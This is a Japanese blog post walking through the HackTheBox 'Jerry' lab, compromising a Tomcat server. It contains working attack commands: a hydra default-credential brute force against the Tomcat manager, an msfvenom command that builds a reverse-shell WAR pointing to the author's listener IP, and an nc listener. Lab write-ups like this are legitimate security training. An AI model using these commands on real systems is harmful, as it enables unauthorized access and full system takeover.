1
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

【HTB】 Jerry - Writeup(Windows/Easy)

1
Last updated at Posted at 2026-04-16

image.png

はじめに

こんにちは!今回はHacktheboxよりJerryのWriteupを紹介したいと思います!

マシン概要

名前        :Jerry
レベル       :Easy
コミュニティレベル :Easy
OS         :Windows

ポートスキャン

nmapを使用してポートスキャンを行います!

sudo nmap -sV -sC -p- -Pn -n -vvv --open $ip -oN ports.txt

image.png

8080ポートにてTomcatが動いているそうなので、ブラウザで確認しましょう!

ログイン

image.png

Manage Appを押下すると、ログイン情報を求められました!

image.png

Seclistsより使えそうなワードリストを探しましよう!

find /usr/share/wordlists/SecLists | grep -i tomcat

image.png

今回はtomcat-betterdefaultpasslist.txtを使用します!

hydraによる認証情報の列挙

hydraを使用して辞書攻撃を行います!今回はhydraを使用しましょう!

hydra -C /usr/share/wordlists/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt -s 8080 http-get://10.129.211.115/manager/html

image.png

admin:admintomcat:s3cretがヒットしました!それぞれ確認してみましょう!

①admin:adminの場合
image.png

Manage Appへのアクセスを拒否されました!

②tomcat:s3cret
admin:admin入力後にManage Appを押下しても入力画面が表示されなくなりました!
その場合はBurpSuiteでリクエストをとりAuthorizationヘッダとCookieヘッダを取り除いてからリクエストを送信することで入力画面が表示されます!認証情報入力後のリクエストでCookieヘッダを取り除くことに注意!

image.png

ちなみにAuthorizationヘッダの暗号文はbase64です!Decoderにて復号すると①で入力した認証情報が確認できます!

image.png

Basic認証のリクエスト送信後、Manage App画面にアクセス出来ました!
image.png

リバースシェル

warファイルをアップロードしウェブページとして表示できる機能を発見しました!こちらを利用してリバースシェルをとりましょう!

image.png

リバースシェルを生成するにはmsfvenomを使用します!

msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.158 LPORT=4444 -f war -o shell.war

生成したwarファイルをアップロードします!

image.png

生成したウェブページを開く前にリバースシェルを受け取るリスナーを生成します!

rlwrap nc -lvnp 4444

アップロードしたウェブページを開きます!すると、、、

image.png

image.png

シェルの獲得に成功しました!
ユーザー名を確認するとなんとSYSTEMユーザー!すでに管理者レベルの権限を所持している状態です!ここからすぐrootフラグがとれそうですね!

AdministratorユーザーのDesktopにてフラッグを見つけました!

image.png

中身をみるとuser.txtとroot.txtの両方が含まれてました!

image.png

1
1
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
1
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?